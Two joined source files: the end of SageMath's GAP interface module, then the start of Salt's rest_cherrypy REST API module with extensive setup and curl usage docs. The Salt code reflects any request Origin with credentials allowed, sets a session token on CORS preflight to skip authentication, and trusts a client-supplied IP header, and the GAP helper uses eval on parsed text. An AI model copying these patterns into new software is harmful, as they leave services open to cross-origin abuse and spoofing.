help = M.help(self._name, pager=False)
return help
def is_GapElement(x):
"""
Returns True if x is a GapElement.
EXAMPLES::
sage: from sage.interfaces.gap import is_GapElement
sage: is_GapElement(gap(2))
True
sage: is_GapElement(2)
False
"""
return isinstance(x, GapElement)
def gfq_gap_to_sage(x, F):
"""
INPUT:
- ``x`` -- GAP finite field element
- ``F`` -- Sage finite field
OUTPUT: element of ``F``
EXAMPLES::
sage: x = gap('Z(13)')
sage: F = GF(13, 'a')
sage: F(x)
2
sage: F(gap('0*Z(13)'))
0
sage: F = GF(13^2, 'a')
sage: x = gap('Z(13)')
sage: F(x)
2
sage: x = gap('Z(13^2)^3')
sage: F(x)
12*a + 11
sage: F.multiplicative_generator()^3
12*a + 11
TESTS:
Check that :trac:`18048` is fixed::
sage: K.<a> = GF(16)
sage: b = a^2 + a
sage: K(b._gap_())
a^2 + a
AUTHOR:
- David Joyner and William Stein
"""
s = str(x)
if s[:2] == '0*':
return F(0)
i1 = s.index("(")
i2 = s.index(")")
q = eval(s[i1+1:i2].replace('^','**'))
if not F.cardinality().is_power_of(q):
raise ValueError('%r has no subfield of size %r' % (F, q))
if s.find(')^') == -1:
e = 1
else:
e = int(s[i2+2:])
if F.degree() == 1:
g = F(gap.eval('Int(Z(%s))' % q))
elif F.is_conway():
f = (F.cardinality() - 1) // (q - 1)
g = F.multiplicative_generator() ** f
else:
raise ValueError('%r is not prime or defined by a Conway polynomial' % F)
return g**e
def intmod_gap_to_sage(x):
r"""
INPUT:
- x -- Gap integer mod ring element
EXAMPLES::
sage: a = gap(Mod(3, 18)); a
ZmodnZObj( 3, 18 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 18
sage: a = gap(Mod(3, 17)); a
Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(0, 17)); a
0*Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
0
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(3, 65537)); a
ZmodpZObj( 3, 65537 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 65537
"""
from sage.rings.finite_rings.all import FiniteField
from sage.rings.finite_rings.integer_mod import Mod
from sage.rings.integer import Integer
s = str(x)
m = re.search(r'Z\(([0-9]*)\)', s)
if m:
return gfq_gap_to_sage(x, FiniteField(Integer(m.group(1))))
m = re.match(r'Zmod[np]ZObj\( ([0-9]*), ([0-9]*) \)', s)
if m:
return Mod(Integer(m.group(1)), Integer(m.group(2)))
raise ValueError("Unable to convert Gap element '%s'" % s)
#############
gap = Gap()
def reduce_load_GAP():
"""
Returns the GAP interface object defined in sage.interfaces.gap.
EXAMPLES::
sage: from sage.interfaces.gap import reduce_load_GAP
sage: reduce_load_GAP()
Gap
"""
return gap
def gap_console():
"""
Spawn a new GAP command-line session.
Note that in gap-4.5.7 you cannot use a workspace cache that had
no commandline to restore a gap session with commandline.
EXAMPLES::
sage: gap_console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * https://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
TESTS::
sage: import subprocess as sp
sage: from sage.interfaces.gap import gap_command
sage: cmd = 'echo "quit;" | ' + gap_command(use_workspace_cache=False)[0]
sage: gap_startup = sp.check_output(cmd, shell=True,
....: stderr=sp.STDOUT,
....: encoding='latin1')
sage: 'www.gap-system.org' in gap_startup
True
sage: 'Error' not in gap_startup
True
sage: 'sorry' not in gap_startup
True
"""
from sage.repl.rich_output.display_manager import get_display_manager
if not get_display_manager().is_in_terminal():
raise RuntimeError('Can use the console only in the terminal. Try %%gap magics instead.')
cmd, _ = gap_command(use_workspace_cache=False)
cmd += ' ' + os.path.join(SAGE_EXTCODE,'gap','console.g')
os.system(cmd)
app.py
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9, 2017.7.3, Oxygen
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: Oxygen
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
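As an illustration only (the values shown are examples, not defaults), several
of the settings above combined in the master config might look like:
.. code-block:: yaml
    rest_cherrypy:
        port: 8000
        ssl_crt: /etc/pki/tls/certs/localhost.crt
        ssl_key: /etc/pki/tls/certs/localhost.key
        thread_pool: 100
        socket_queue_size: 30
        # example log paths; adjust for your system
        log_access_file: /var/log/salt/api_access.log
        log_error_file: /var/log/salt/api_error.log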
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
but cannot express complex data structures, which are often required for some
Salt commands, such as starting a state run that uses Pillar data. Salt's CLI
tool can reformat strings passed in at the CLI into complex data structures,
and that behavior also works via salt-api, but it can be brittle; since
salt-api accepts JSON, it is best to just send JSON.
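As a point of comparison, the same kind of call sent as JSON (a sketch reusing
the ``test.ping`` example shown elsewhere in this document) would look like:
.. code-block:: bash
    curl -sSk https://localhost:8000 \\
        -b ~/cookies.txt \\
        -H 'Content-Type: application/json' \\
        -H 'Accept: application/x-yaml' \\
        -d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'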
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running async jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
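For example, a hedged sketch of the earlier ``test.ping`` call run through the
``local_async`` client (the response contains only the job id; fetch the
return later from ``/jobs/<jid>``):
.. code-block:: bash
    curl -b ~/cookies.txt -sSi localhost:8000 \\
        -H 'Content-type: application/json' \\
        -d '[{"client": "local_async", "tgt": "*", "fun": "test.ping"}]'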
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
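As a rough, illustrative sketch only (the numbers below are not
recommendations; tune and measure on your own hardware):
.. code-block:: yaml
    rest_cherrypy:
        port: 8000
        thread_pool: 300
        socket_queue_size: 100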
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed. '
'Possible upstream bug: '
'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed.')
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
from salt.ext import six
from salt.ext.six import BytesIO
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
.. versionadded:: 2016.3.0
Verify user requests against the API whitelist (user/IP pairs) in order
to provide whitelisting for the API similar to the master's ACL, but at
the API level.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', salt.utils.json.dumps),
('application/x-yaml', functools.partial(
salt.utils.yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
# The TimeoutError exception class was removed in CherryPy 12.0.0, but
# we still check for its existence and handle it in CherryPy < 12.
# The check was moved down from the SaltClientTimeout handler above
# because a one-line if statement throws a BaseException inheritance
# TypeError.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
